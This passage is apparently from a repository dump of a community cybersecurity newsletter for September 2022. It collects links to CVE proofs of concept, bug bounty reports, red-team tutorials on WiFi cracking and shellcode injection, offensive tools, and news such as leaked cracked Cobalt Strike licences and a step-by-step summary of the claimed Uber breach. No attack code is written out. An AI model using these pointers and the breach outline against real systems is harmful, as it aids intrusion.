\n \n ---\n \n *SAVE TIME*\n\n[![event](https://img.shields.io/badge/-Event-%23ffff33?style=for-the-badge&logo=github&logoColor=black)](#title-event) [![cve poc](https://img.shields.io/badge/-CVE-%23ffff33?style=for-the-badge&logo=github&logoColor=black)](#title-cve) [![bug bounty](https://img.shields.io/badge/-Bug%20Bounty-%23ffff33?style=for-the-badge&logo=github&logoColor=black)](#title-bb) [![research & Business](https://img.shields.io/badge/-Research-%23ffff33?style=for-the-badge&logo=github&logoColor=black)](#title-research) [![news](https://img.shields.io/badge/-News-%23ffff33?style=for-the-badge&logo=github&logoColor=black)](#title-news) [![hiring](https://img.shields.io/badge/-Hiring-%23ffff33?style=for-the-badge&logo=github&logoColor=black)](#title-hiring) [![tools](https://img.shields.io/badge/-Tools-%23ffff33?style=for-the-badge&logo=github&logoColor=black)](#title-tools)\n\n ---\n \n### 🤝🤝🤝 How to get involve in Contribution. #Contact-Us 🤝🤝🤝\n

\n \n
\n\n
\nPriview\n \n If you quickly want to get involved in making **Weekly Cybersecurity Update** a better, but aren't sure how.\n CONTACT \"@Attr1b\" on Telegram or mail us to \"resethackerofficial@gmail.com\" \n \n Please write a reason, How do you plan to contribute it.\n
\n\n \n#### I'm so grateful to all the [Organization and researchers](https://github.com/RESETHACKER-COMMUNITY/Community-Contributers/blob/main/StayUptoDate.md) without their Writeups, article, findings and whitepaper [Weekly infosec Update](https://github.com/RESETHACKER-COMMUNITY/Community-Contributers/blob/main/StayUptoDate.md) would not have been possible.\n\n#### I'm very grateful to all the [Organization, group, and community that support us for the engagement](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/SupportedBy/CommunityEngagementPartners.md). Without their support reaching \"Weekly InfoSec Update\" to hacker would not have been possible.\n\n#### Wrapping Up\n\n Have questions, Suggestions, or feedback? Just reply directly to mail, I'd love to hear from you.\n \n If you find this update useful and know other people who would too, I'd really appreciate if you'd forward it to them ??\n Thanks for reading!\n" }, { "path": "ResetCybersecuirty/Weekly_Infosec_Update(WIU)/Weekly_Infosec_Update_07.md", "content": " #### Hey Hackers, I hope you’ve been doing well on weekend! and quote of Week is \"Don't rush the Process. Good Things Take Time.\"\n \n Here are the Agenda for *Weekly infosec Update v0.5* : **14th September - 20th September 2022**\n \n![](https://img.shields.io/github/issues/RESETHACKER-COMMUNITY/Pentesting-Bugbounty)\n![](https://img.shields.io/github/forks/RESETHACKER-COMMUNITY/Pentesting-Bugbounty)\n![](https://img.shields.io/github/stars/RESETHACKER-COMMUNITY/Pentesting-Bugbounty)\n![](https://img.shields.io/github/last-commit/RESETHACKER-COMMUNITY/Pentesting-Bugbounty)\n

\"Pentesting-Bugbounty//ResetCybersecuirty/\"

\n\n**Tips to SAVE TIME & How to READ this Newsletter? 👇**\n- Select the topic from the *Navbar* bellow and click on **Priview** to see the Details:\n- Open all relevent Title in New Tab (Ctrl+Click) then READ it one by one.\n\n[![event](https://img.shields.io/badge/-Event-%23ffff33?style=for-the-badge&logo=github&logoColor=black)](#title-event) [![cve poc](https://img.shields.io/badge/-CVE-%23ffff33?style=for-the-badge&logo=github&logoColor=black)](#title-cve) [![bug bounty](https://img.shields.io/badge/-Bug%20Bounty-%23ffff33?style=for-the-badge&logo=github&logoColor=black)](#title-bb) [![research & Business](https://img.shields.io/badge/-Research-%23ffff33?style=for-the-badge&logo=github&logoColor=black)](#title-research) [![news](https://img.shields.io/badge/-News-%23ffff33?style=for-the-badge&logo=github&logoColor=black)](#title-news) [![hiring](https://img.shields.io/badge/-Hiring-%23ffff33?style=for-the-badge&logo=github&logoColor=black)](#title-hiring) [![tools](https://img.shields.io/badge/-Tools-%23ffff33?style=for-the-badge&logo=github&logoColor=black)](#title-tools)\n\n![WIUv0 4](https://user-images.githubusercontent.com/25515871/189512256-bb51318d-3d0a-41a6-b3b9-a69cd98c2f2a.png)\n\nHuge thanks to our awesome [Community Leader for contribution and giving back to community](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/SupportedBy/Team%26Contributors.md) and thankyou for being the part of team.\n\n
\nPriview\n - Contributors : Good Resources Share, Paul miller, Tarang Parmar, Tuhin Bose, Vikram and Alexandre ZANNI.\n
\n \n---\n\n### Let's start with the EVENT recap, and my apology for So much Info. We're finding a way to make it organized and user friendly.\n\n### 🎫🎫🎫 EVENT recap 🎫🎫🎫\n \nThis Week THREATCON 2022 Conferences and Null Delhi meetup registration was mainly trending on twitter and We have collected public available important Talk, Slides, Tools, Podcast, Videos, upcomming events related to conferences, talks & webinars so you don't miss it and watch them, at a time that suits you.\n\n
\nPriview\n\n- **Conferences**\n - At THREAT CON SEP 2022, Akshay & bharath shared their talk [FRida Unleashed - Scratching beneath the surface of bug bounties](https://speakerdeck.com/0xbharath/frida-unleashed-scratching-beneath-the-surface-of-bug-bounties)\n\n- **Webinars and videos**\n - Null Delhi September Meetup is scheduled for 24 Sep 2022 at @esecforte office in Gurugram. you can [Register here](https://null.community/events/844-delhi-monthly-meetup)\n - For Red Team, This is really a awsome video but you have you watch it with subtitle where @lsecqt demonstrated a [walkthrough for Sliver C2 is brand new (and still in development) Command and Control Framework](https://www.youtube.com/watch?v=QO_1UMaiWHk). It has only CLI version (for now) and is designed to be extremely easy to install and to work with.\n\n- **Ongoing/Upcomming 𝙀𝙑𝙀𝙉𝙏𝙎**: \n \n - MSSP Alert Live : 19th-21st September | Washington DC\n - CSO50 : 19th-21st September | Washington DC \n - Fal.Con 2022 : 19th-21st September | Las Vegas \n - Texas Cyber Summit 2022 : 22nd-24th September | Austin\n - BSides Singapore Conference 2022 : 22nd-23rd September\n - InfoSec World 2022 : 26th-28th September | Orlando \n \n
\n \n---\n\n### 🪲🪲🪲 CVE : poc exploit and cve analysis 🪲🪲🪲\n\n#### Week -> [14th September - 20th September 2022](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/CVE's/Readme.md).\n\nThere are tens of thousands of vulnerabilities disclosed each Week. Only a handful of them will ever be exploited So In this Section, Every Week we filter out [CVE poc and analysise the CVE writeups that have Higher Severity.](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/CVE's/Readme.md) Click on link to see all the mentioned poc, analysis and exploits.\n\n
\nPriview\n\n \n Security Patched : Latest IT security vulnerability patched within this week on selected company such as Apple, Google, \n Microsoft, Github, Linux(Ubuntu, kali etc), wordpress etc. \n \n CVE:ANALYSIS & POC: CVE-2022-32883 Analysis: Turning Your Computer Into a GPS Tracker With Apple Maps. \n \n \n CVE POC : CVE-2022-32548 RCE, CVE-2022-2588, CVE-2022-34721, CVE-2022-36804, CVE-2022-34709, \n CVE-2022-33980, CVE-2019-2215 & GwisinMsi poc based on Recreating an MSI Payload for Fun and no profit blog. \n \n\n Note - If you don't play with CVE then please skip this Section.\n
\n\n\n### 🐞🐞🐞 BUG BOUNTY : report, vulnerability Writeups and resources 🐞🐞🐞\n\nIn this Beginners friendly domain, We have 2 segment, \n- **1. Hackerone/Bugcrowd reports for Bug Hunters**\n- **2. Bug bounty writeups, tips & resources**\n\nLast week, @intigri asked community about Pickup line for Bug Hunter and one of my favourite was\n- You're like a P1: special and hard to find.\n\n
\nPriview\n \n *1. In This Segment, We have filtered out Top **HACKERONE/BUGCROWD REPORT** for Bug Hunters :*\n - 🐞$4,000 - [SSRF in Functional Administrative Support Tool pdf generator (████)](https://hackerone.com/reports/1628209) in U.S. Dept Of Defense.\n - 🐞$2,400 - [Airflow Daemon Mode Insecure Umask Privilege Escalation](https://hackerone.com/reports/1690093) in Apache Airflow prior to 2.3.4.\n - 🐞$2,000 - [Remote Code Execution on https://███ via improper access control to SCORM Zip upload/import](https://hackerone.com/reports/1122791) in U.S. Dept Of Defense.\n - 🐞[STORED XSS in █████████/nlc/login.aspx via \"edit\" GET parameter through markdown editor](https://hackerone.com/reports/1631447) in U.S. Dept Of Defense.\n\n *2. In This Beginners friendly segment, We collect and filter out **BUG BOUNTY WRITEUPS, TIPS & RESOURCES*** \n - @Mohsinkhan answered a question for new bug hunters through article [What would I do if I start bug hunting from 0 again?](https://mokhansec.medium.com/what-would-i-do-if-i-start-bug-hunting-from-0-again-79c7fa78b789)\n - In this article, @AkashVenky talked about [Network Segmentation Pentesting](https://akash-venky091.medium.com/network-segmentation-pentesting-97238d63b001) and How it could be used to validate that less-secure networks.\n \n - @302Found, releases the [PART 2 of Cool Recon techniques every hacker misses!🔥](https://infosecwriteups.com/cool-recon-techniques-every-hacker-misses-episode-2-8024e8338756) and incase you have not read the [PART 1](https://infosecwriteups.com/cool-recon-techniques-every-hacker-misses-1c5e0e294e89)\n \n - @zer0d shared a writeup explaining [How he found 3 vulnerability in a day?](https://infosecwriteups.com/how-i-found-3-bug-bounties-in-a-day-c82fe023716e) and the 3 vulnerabilites was Bypassed one-time usage on the sign-in link, The credit card checker bypass, E-mail bombing and Rate limit.\n \n - @OmarHashem shared a story on How he [abused the file upload function to get a high severity vulnerability in Bug Bounty](https://infosecwriteups.com/how-i-abused-the-file-upload-function-to-get-a-high-severity-vulnerability-in-bug-bounty-7cdcf349080b)\n \n - Bug hunter @viruszzwarning observed that most of the websites are having a specific type of vulnerability, i.e. directory listing and this is [leaking their clients identification details, like Aadhaar card, PAN card, Bank details and many more…](https://viruszzwarning.medium.com/aadhaar-pan-info-leak-4189b6057cd4)\n \n - Few motnths back I shared a video for Bun(new open source runtime environment created by Jared Sumner and over 40 contributors.) where developers are predicting [Bun - an incredibly fast all-in-one JavaScript runtime going to Replece NodeJs](https://medium.com/@appiahyoofi/goodbye-node-js-9e2f71f5e430). As bug hunters you should keep an eye on this.\n \n
\n\n--- \n\n\n### 🔍🔍🔍 RESEARCH, SECURITY & IT ORGANIZATION 🔍🔍🔍\n\n In this Segment, we collect amazing things from all over the infosec domain for Researcher and professionals those who want to explore Security, looking for the new approach to find vulnerabilty, want to track of Infosec market and startups. \n\nHere we have \n - **1 - Web Security and android security**\n - **2 - Cloud Security**\n - **3 - Blue/Red/Threat Intelligence Team**\n - **4 - Infosec Business, funded and Market**\n \n Bug Hunters or junior pentester can skip this Section or you can check out the Web Security & android security.\n\n
\nPriview\n \n - **1 - Web Security and android security**\n - [CompTIA Pentest + Certification review after 2nd attempt](https://notes.n3m3515.space/pentest/comptia-pentest-002-notes) by Inside \n - [How to avoid data breaches with GraphQL?](https://blog.escape.tech/data-leaks/), by Sophie Boulaaouli\n - A security expert's [guide on scanning unpatched wordpress blogs](https://blog.criminalip.io/2022/09/13/wordpress-vulnerability/)\n - A report by WPSCAN.COM, where they have demonstared [HOW TO:FIND WORDPRESS PLUGIN VULNS](https://drive.google.com/file/d/1DlzXw2iNvLXzm-it5G6nwENnL0v7zcrk/view?usp=sharing)\n - @hakluke & @pry0cc wrote a blog for projectdiscovery [Guide to DNS takeovers 😊](https://blog.projectdiscovery.io/guide-to-dns-takeovers/)\n - Tamir describes in this article how he found CVE-2021-1961, [Attacking the Android kernel using the Qualcomm TrustZone](https://tamirzb.com/attacking-android-kernel-using-qualcomm-trustzone) where Android kernel exploit utilizes the TrustZone in order to compromise the kernel. \n \n - **2 - Cloud Security**\n - [Azure Threat Research Matrix](https://microsoft.github.io/Azure-Threat-Research-Matrix/) -> The purpose of this is to conceptualize the known TTP that adversaries may use against Azure.\n - [Incident response in AWS CloudTrail](https://www.chrisfarris.com/post/aws-ir/)\n - [Threat Detection, Investigation, and Response in the Cloud](https://services.google.com/fh/files/misc/gcat_threat_detection_cloud_a.pdf)\n \n- **3 - Blue/Red/Purple/Threat Intelligence Team**\n - **Blue Team**\n - Practical Guidance for [IT Admins to respond after Ransomware attacks](https://m365internals.com/2022/09/19/practical-guidance-for-it-admins-to-respond-to-ransomware-attacks/)\n - [How to kick off an incident response investigation for a compromised SaaS account](https://pushsecurity.com/blog/how-to-kick-off-an-incident-response-investigation-for-a-compromised-saas/), by Johann Scheepers.\n - [Data-Centric Security: Threat Hunting based on Zipf’s Law](https://ditrizna.medium.com/data-centric-security-threat-hunting-based-on-zipfs-law-50ad919fc135)\n - [Cross-Layer Security: A Holistic View of Internet Security](https://freedom-to-tinker.com/2022/09/20/cross-layer-security-a-holistic-view-of-internet-security/), by Henry Birge-Lee, Liang Wang, Grace Cimaszewski, Jennifer Rexford and Prateek Mittal.\n - [The Evolution of the Chromeloader Malware](https://blogs.vmware.com/security/2022/09/the-evolution-of-the-chromeloader-malware.html)\n - [Recreating an MSI Payload for Fun and no profit](https://blog.sunggwanchoi.com/recreating-a-msi-payload-for-fun-and-no-profit/)\n - [Efficient Proofs of Software Exploitability for Real-world Processors](https://eprint.iacr.org/2022/1223)\n \n - **Red Team**\n - [Windows Kernel Exploitation instruction](https://hackmd.io/@truebad0ur/WindowsKernelExploiting) and [Assembled HEVD driver and loader](https://drive.google.com/file/d/19NmwL88KmiOAcRlodNCB-m9oNxC31But/view?usp=sharing)\n - How to [crack the WEP key using only one data packet and a wordlist, and then use the wireshark tool to decode the data packet](https://tbhaxor.com/decrypt-wep-traffic-with-insufficient-ivs/)\n - How to [crack the key of a WEP-encrypted WiFi network](https://tbhaxor.com/pivot-through-protected-wifi-network/) and pivot into it to interact with vulnerable services running on it.\n - How to [capture the 2 out of 4 EAPOL handshakes of WPA network](https://tbhaxor.com/cracking-wpa-psk-using-aircrack/) and crack the password from a wordlist. \n - How to [set up a honey pot access point with hostapd and capture the EAPOL handshake from a probing client to brute force the pre-shared key.](https://tbhaxor.com/crack-wpa-psk-from-probing-clients-without-access-point/)\n - [Shellcode Injection in C# - Part 3](https://crypt0ace.github.io/posts/Shellcode-Injection-Techniques-Part-3/) - using API call QueueUserAPC, By Ahmed Sher.\n \n \n - **4 - Infosec Business, funded and Market** \n \n - [CISA Strategic plan report for year 2023 - 2025](https://drive.google.com/file/d/1-vQYIJ7sZrn_PAxpO3W0ytX2-Oc2eXoB/view?usp=sharing)\n - [Why do security products fail?](https://my.rage.cloud/why-do-security-products-fail-7477dd0ec878) \n \n - InfoSec Market\n - [Understand the Indian Market, client and understand who is right client for your business](https://drive.google.com/file/d/1yRuIGqb5gcWN_F_tgqHgZA7RuLr34sIS/view?usp=sharing) \n - [Cybersecurity Funding Review for August 2022](https://www.returnonsecurity.com/cybersecurity-funding-review-august-2022/?utm_source=securityfundednewsletter) , by Mike p.\n - [Global Automotive Cybersecurity Market to Reach $5.3 Billion by 2026](https://www.prnewswire.com/news-releases/global-automotive-cybersecurity-market-to-reach-5-3-billion-by-2026--301622955.html?utm_source=securityfundednewsletter)\n \n
\n\n---\n \n\n### 📰📰📰 NEWS 📰📰📰\n\nHere We have 3 Segment,\n - **1. Twiter Threads & Tips**\n - **2. Data Breach & BlackHat Hackers Leaked**\n - **3. Top Infosec News**\n \n
\nPriview\n \n- **TWITTER THREAD & TIPS**\n \n - 🟢 [LockBit ransomware group pays its first ever $50k bug bounty](https://twitter.com/ido_cohen2/status/1571039567666638848)\n - 🟢 On 12th Sept 2022 [idclickthat](https://twitter.com/idclickthat) tweeted about [Malware @Zoom downloads](https://twitter.com/idclickthat/status/1569350142230204421?t=_7lpBg7U-iokSMCGtSXZSw&s=19) On 19th Sept, Cyble Research and Intelligence Labs (CRIL) released a blog about @idclickthat tweet investigation and It turn out [New Malware Campaign Targets Zoom Users](https://blog.cyble.com/2022/09/19/new-malware-campaign-targets-zoom-users/)\n - 🟢 @SamCurry received [2 crore from Google because of human error.😅](https://twitter.com/samwcyo/status/1569897392560050178?t=TROhjl9xQpcHnG3UOv_uow&s=19)\n - 🟢 [William Wallace](https://twitter.com/phyr3wall/) released his [1st youtube video on DNS Zone Takeovers](https://www.youtube.com/watch?v=DLNjP9KSgzA&feature=youtu.be)\n \n- **Leaks & BlackHat Hacker: Source Unknown**\n \n - 🔴 **News - Paid Tools** that has been leaked or cracked by Black Hat Hackers : Cobaltstrike 4.7.1 Licence, CANVAS 7.27, Invicti Standard 6.7.0.37625, acunetix_14.9.220913107, BurpSuite_pro_v2022_9.1,Acunetix Version 14 build 14.9.220713150 for Windows, Nessus Core + tenableSC 20220307 ISO & Linux, Malcat malware analyzer, xray_1.9.1_windows_x64, bruteratel 1.2.2, and 010 Editor 13.0-beta2.\n \n - 🔴 **News - Black Hat Hacker leaked** : GTA 6 has been leaked over onion browser, Conti source code for v3.7.7 and Taurus bot source code has been leaked. \n \n - 🔴 \"UBER GOT HACKED\". After few days Uber officially recorgnized the Data Breach and mentioned that Laplus$ group was behind the attack but Hacker group VX underground and indivisuals such as ColtonSeal, Kevin shared multiple SS where hacker claimed and mocked the security of Uber and shared the Unconfirmed method of breach:\n - Socially engineer an employee to get on their VPN (could have been prevented with webauthn / hardware 2fa)\n - Once on VPN, scan their intranet and find a network share \n - Network share has powershell scripts contained the username and password for a admin user in Thycotic (PAM) Using this hacker was able to extract secrets for all services, DA, DUO, Onelogin, AWS, GSuite\", domain admin, AWS instance, HackerOne administration panel, and more.\n - From there can get full access to all systems.\n - When the individual breached Uber, they sent a slack notification to everyone informing them the company had been breached.Employees thought it was a joke.\n\n - **Top Infosec News:** \n\n - 🟢 **Announcement** : \n - [Active Directory integration features in Ubuntu 22.04](https://ubuntu.com/engage/New-Active-Directory-integration-features) \n - Apple has released another round of security updates to address multiple vulnerabilities in iOS and macOS, including a new zero day vulnerabilty.\n - Microsoft on Tuesday shipped fixes to quash 64 new security flaws across its software lineup, including one zero-day flaw that has been actively exploited in real-world attacks. \n - 🟢 TikTok still denies security breach of 2 billions users information after hackers leak user data, source code. \n - 🟢 Rockstar Games Confirms Hacker Stole Early Grand Theft 6 and Uber also confirm that their data has been leaked by Laplus$ group.\n - 🟢 [Europol and Bitdefender Release Free Decryptor for LockerGoga Ransomware](https://www.nomoreransom.org/uploads/LockerGoga-Decrypt-Doc.pdf)\n - 🟢 [Microsoft Teams stores auth tokens as cleartext in Windows, Linux, Macs](https://www.bleepingcomputer.com/news/security/microsoft-teams-stores-auth-tokens-as-cleartext-in-windows-linux-macs/), by bleepingcomputer.\n
\n \n---\n \n\n### 🕴️🕴️🕴️ HIRING, COURSE & TRAINNING. 🕴️🕴️🕴️\n \nIn this Beginners friendly segment, we talk about and share latest resources related to Jobs in this month, interview questions and free trainning offered by organization, community and leader.\n\n
\n Priview\n \n1. Take a Look at [Internship/Job Opening in September 2022](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/CyberSecurityJobs/Jobs.md#Weekly-Cybersecurity-Hiring-Aug-2022).\n\n2. Here ResetHacker have collected [Interview Questions asked by organization](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/CyberSecurityJobs/InterviewQA.md).\n\n
\n \n---\n\n \n### 🛠️🛠️🛠️ TOOLS 🛠️🛠️🛠️ \n\nCommunity members test the tools and we filter out most demanding and every week We filter out helpful tools that satisfy the hacker Purpose in different domains.\n\n - **1. SAST/DAST/IAST/RASP/Recon/Network/Web Pentesting** - 5 Tools\n - **2. Cloud Security** - 3 Tools\n - **3. Blue/Red Team/Threat intelligence Tools** - 5 Tools\n - **4. Reverse engineering & OSINT** - 3 Tools\n - **5. IOT, OS & Hardware** - 3 Tools\n\n
\nPriview\n \n - **1. SAST/DAST/IAST/RASP/Recon/Network/Web Pentesting** - 5\n \n - [CATS](https://github.com/Endava/cats) -> REST API Fuzzer And Negative Testing Tool For OpenAPI Endpoints, by Endava and a detailed tutorials on [how to use CATS](https://www.kitploit.com/2022/09/cats-rest-api-fuzzer-and-negative.html) by kitploit.\n - [UseReFuzz](https://github.com/root-tanishq/userefuzz) -> SQLI Tester for HTTP Headers, by [Kun](https://twitter.com/root_tanishq)\n - [Mizusawa](https://github.com/0x727/ShuiZe_0x727) -> Information Gathering Automation Tool.\n - [Darc - Darkweb Crawler Project.](https://github.com/JarryShaw/darc) -> darc is designed as a swiss army knife for darkweb crawling.It integrates requests to collect HTTP request and response information, such as cookies, header fields, etc. It also bundles selenium to provide a fully rendered web page and screenshot of such view.\n - [requests-ip-rotator](https://github.com/Ge0rg3/requests-ip-rotator) -> A Python library to utilize AWS API Gateway's large IP pool as a proxy to generate pseudo-infinite IPs for web scraping and brute forcing. \n \n \n - **2. Cloud Security** - 3\n - [CloudFox](https://github.com/BishopFox/cloudfox) -> Automating situational awareness for cloud penetration tests. \n - [cloudvelo](https://github.com/Velocidex/cloudvelo) -> An experimental Velociraptor implementation using cloud infrastructure.\n - [Cloudlist](https://github.com/projectdiscovery/cloudlist) -> A multi-cloud tool for getting Assets from Cloud Providers. This is intended to be used by the blue team to augment Attack Surface Management efforts by maintaining a centralized list of assets across multiple clouds with very little configuration efforts.\n \n - **3. Blue/Red/Purple Team, IR and Threat intelligence Tools** - 5\n - [Varc - Volatile Artifact Collector](https://github.com/cado-security/varc) -> varc collects a snapshot of volatile data from a system. It tells you what is happening on a system, and is of particular use when investigating a security incident.\n - [Codecepticon](https://github.com/Accenture/Codecepticon) -> An offensive security obfuscator for C#, VBA, and PowerShell.\n - [LDAP Nom Nom - anonymously bruteforce Active Directory usernames at high speed](https://github.com/lkarlslund/ldapnomnom),which allows you to anonymously bruteforce Domain Controllers to find usernames in Active Directory at high speeds.\n - [exploits-predict](https://github.com/wisoffe/exploits-predict) -> Predicting the probability of an exploit being released after a CVE is published (by Machine learning algorithm) and this project is based on [Cookiecutter data science project template.](https://drivendata.github.io/cookiecutter-data-science/)\n - [Elixir Secure Coding Training (ESCT)](https://github.com/Podium/elixir-secure-coding) - An interactive cybersecurity curriculum designed for enterprise use.\n \n - **4. Reverse Engineering & OSINT Tools** - 3\n - [PE-bear](https://github.com/hasherezade/pe-bear) is a multiplatform reversing tool for PE files. Its objective is to deliver fast and flexible “first view” for malware analysts, stable and capable to handle malformed PE files.\n - [uosint](https://github.com/uosint-project/uosint) -> Find The Profiles Of A Person On Social Networks. \n - [TRIFECTA](https://github.com/V1XX-1/TRIFECTA-Search-Tool) -> A batch script that allows you to search a phrase or keywords with 12 different search engines. You can do so one at a time or all at once. \n \n - **5. IoT, OS & Hardware** - 3\n \n - [CiLocks](https://github.com/tegal1337/CiLocks) -> Crack Interface lockscreen, Metasploit and More Android/IOS Hacking.\n - [Cotopaxi](https://github.com/Samsung/cotopaxi) - Set of tools for security testing of Internet of Things devices using specific network IoT protocols.\n - [HKSSY/Drone-Hacking-Tool](https://github.com/HKSSY/Drone-Hacking-Tool) -> Drone Hacking Tool is a GUI tool that works with a USB Wifi adapter and HackRF One for hacking drones.\n\n
\n \n ---\n \n *SAVE TIME*\n\n[![event](https://img.shields.io/badge/-Event-%23ffff33?style=for-the-badge&logo=github&logoColor=black)](#title-event) [![cve poc](https://img.shields.io/badge/-CVE-%23ffff33?style=for-the-badge&logo=github&logoColor=black)](#title-cve) [![bug bounty](https://img.shields.io/badge/-Bug%20Bounty-%23ffff33?style=for-the-badge&logo=github&logoColor=black)](#title-bb) [![research & Business](https://img.shields.io/badge/-Research-%23ffff33?style=for-the-badge&logo=github&logoColor=black)](#title-research) [![news](https://img.shields.io/badge/-News-%23ffff33?style=for-the-badge&logo=github&logoColor=black)](#title-news) [![hiring](https://img.shields.io/badge/-Hiring-%23ffff33?style=for-the-badge&logo=github&logoColor=black)](#title-hiring) [![tools](https://img.shields.io/badge/-Tools-%23ffff33?style=for-the-badge&logo=github&logoColor=black)](#title-tools)\n\n ---\n \n### 🤝🤝🤝 How to get involve in Contribution. #Contact-Us 🤝🤝🤝\n

\n \n
\n\n
\nPriview\n \n If you quickly want to get involved in making **Weekly Cybersecurity Update** a better, but aren't sure how.\n CONTACT \"@Attr1b\" on Telegram or mail us to \"resethackerofficial@gmail.com\" \n \n Please write a reason, How do you plan to contribute it.\n
\n\n \n#### I'm so grateful to all the [Organization and researchers](https://github.com/RESETHACKER-COMMUNITY/Community-Contributers/blob/main/StayUptoDate.md) without their Writeups, article, findings and whitepaper [Weekly infosec Update](https://github.com/RESETHACKER-COMMUNITY/Community-Contributers/blob/main/StayUptoDate.md) would not have been possible.\n\n#### I'm very grateful to all the [Organization, group, and community that support us for the engagement](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/SupportedBy/CommunityEngagementPartners.md). Without their support reaching \"Weekly InfoSec Update\" to hacker would not have been possible.\n\n#### Wrapping Up\n\n Have questions, Suggestions, or feedback? Just reply directly to mail, I'd love to hear from you.\n \n If you find this update useful and know other people who would too, I'd really appreciate if you'd forward it to them ??\n Thanks for reading!\n" }, { "path": "ResetCybersecuirty/Weekly_Infosec_Update(WIU)/Weekly_Infosec_Update_08.md", "content": "#### Hey Hackers, I hope you’ve been doing well on the weekend! and quote of Week is \"Don't rush the Process. Good Things Take Time.\"\n Here are the Agenda for *Weekly infosec Update v0.6* : **21st-27th September 2022**\n \n![](https://img.shields.io/github/issues/RESETHACKER-COMMUNITY/Pentesting-Bugbounty)\n![](https://img.shields.io/github/forks/RESETHACKER-COMMUNITY/Pentesting-Bugbounty)\n![](https://img.shields.io/github/stars/RESETHACKER-COMMUNITY/Pentesting-Bugbounty)\n![](https://img.shields.io/github/last-commit/RESETHACKER-COMMUNITY/Pentesting-Bugbounty)\n

\"Pentesting-Bugbounty//ResetCybersecuirty/\"

\n\n**Tips to SAVE TIME & How to READ this Newsletter? 👇**\n- Select the topic from the *Navbar* bellow and click on **Preview** and **Arrow (>)** to see the Details:\n- Open all relevant Title in New Tab (Ctrl+Click) then READ it one by one.\n\n[![cve poc](https://img.shields.io/badge/-CVE-%23ffff33?style=for-the-badge&logo=github&logoColor=black)](#title-cve) [![research & Business](https://img.shields.io/badge/-Research-%23ffff33?style=for-the-badge&logo=github&logoColor=black)](#title-research) [![beginners](https://img.shields.io/badge/-News-%23ffff33?style=for-the-badge&logo=github&logoColor=black)](#title-beginners) \n\n![WIU_Trail_Pro](https://user-images.githubusercontent.com/25515871/191970244-14b8821b-acd9-4fb6-8e9b-f627392c4715.png)\n \n---\n\n\n### 🪲🪲🪲 CVE : poc exploit and cve analysis 🪲🪲🪲\n\n#### Week -> [21st September - 27th September 2022](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/CVE's/Readme.md).\n\n> There are tens of thousands of vulnerabilities disclosed each Week. Only a handful of them will ever be exploited So In this Section, Every Week we filter out [Security that has been Patched within a Week, CVE: ANALYSIS & POC that have critical or Higher Severity](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/CVE's/Readme.md).\n
\nPreview\n\n \n \n Security Patched within a Week: Latest vulnerability that has been patched within a week(21th Sep-27th Sep 2022). \n featuring releases from Apple, Google, Microsoft, Github, Linux(Ubuntu, kali etc), wordpress etc.\n \n CVE:ANALYSIS & POC: CVE-2022-39197, CVE-2022-36934, CVE-2022-27492, CVE-2022-40286, cve-2021-41653, CVE-2022-39205, CVE-2022-39206, CVE-2022-39207 & CVE-2022-39208.\n \n CVE POC (0-Day): CVE-2022-39197, CVE-2022-36804, CVE-2022-30206, CVE-2022-28282, CVE-2022-34729, Cronos poc, \n CVE-2022-23743, Webshell - Open source project, Windows10 - Custom Kernel Signers.\n \n\n
\n\n--- \n\n\n### 🔍🔍🔍 RESEARCH, SECURITY & IT ORGANIZATION 🔍🔍🔍\n\n> In this Segment, we collect amazing whitepaper/research/technique/resources from all the infosec domains for Researcher and professionals those who want to explore Security, looking for the new approach to find vulnerability, want to track the Infosec market and startups. \n
\n1 - Infosec Business, funded and Market \n \n - **1 - Infosec Business, funded and Market** \n \n - [Cloudflare’s v2.0 Startup Plan to Build your next startup on Cloudflare](https://blog.cloudflare.com/startup-program-v2/)\n - [CISA Strategic plan report for year 2023 - 2025](https://drive.google.com/file/d/1-vQYIJ7sZrn_PAxpO3W0ytX2-Oc2eXoB/view?usp=sharing)\n - [Bug Hunting for the 99%](https://www.huntress.com/blog/bug-bounties-for-the-99) by Andrew Morgan\n - [Why Is ISO 27001 Important For Small Businesses?](https://secureblitz.com/why-is-iso-27001-important-for-small-businesses/)\n - [Why do security products fail?](https://my.rage.cloud/why-do-security-products-fail-7477dd0ec878) \n \n - InfoSec Market\n - In recent week Microsoft acquires cyber threat detecting firm Miburo and Google Cloud completes Mandiant acquisition for $5.4 billion.\n - Understand the [Indian Market, client and understand who is right client for your business](https://drive.google.com/file/d/1yRuIGqb5gcWN_F_tgqHgZA7RuLr34sIS/view?usp=sharing) \n \n
\n \n
\n 2 - Web Security and android security, 3 - Cloud Security, 4 - Blue/Red/Threat Intelligence Team\n \n - **1 - Web Security and android security**\n \n - [Pentesting Cisco networks](https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9) by @Magama Bazarov \n - [How we Abused Repository Webhooks to Access Internal CI Systems at Scale](https://www.cidersecurity.io/blog/research/how-we-abused-repository-webhooks-to-access-internal-ci-systems-at-scale/)\n - [How to secure against forced browsing info disclosures](https://rez0.blog/cybersecurity/2022/09/22/prevent-info-disclosures.html)\n - [Flutter review and its reverse engineering](https://swarm.ptsecurity.com/fork-bomb-for-flutter/), It can help you in the process of bug hunting or penetration testing.\n - [Diving Into Electron Web API Permissions](https://blog.doyensec.com/2022/09/27/electron-api-default-permissions.html)\n - [How to avoid data breaches with GraphQL?](https://blog.escape.tech/data-leaks/), by Sophie Boulaaouli \n - Hacking the [PS4 / PS5 through the PS2 Emulator - Part 1 - Escape](https://cturt.github.io/mast1c0re.html)\n \n - **2 - Cloud Security**\n - Can you replace [Microsoft Active Directory with Azure Active Directory?](https://jumpcloud.com/blog/can-i-replace-ad-with-azure-ad) -> This is a very common question for IT professionals.\n - [Critical OCI vulnerability allows unauthorized access to customer cloud storage 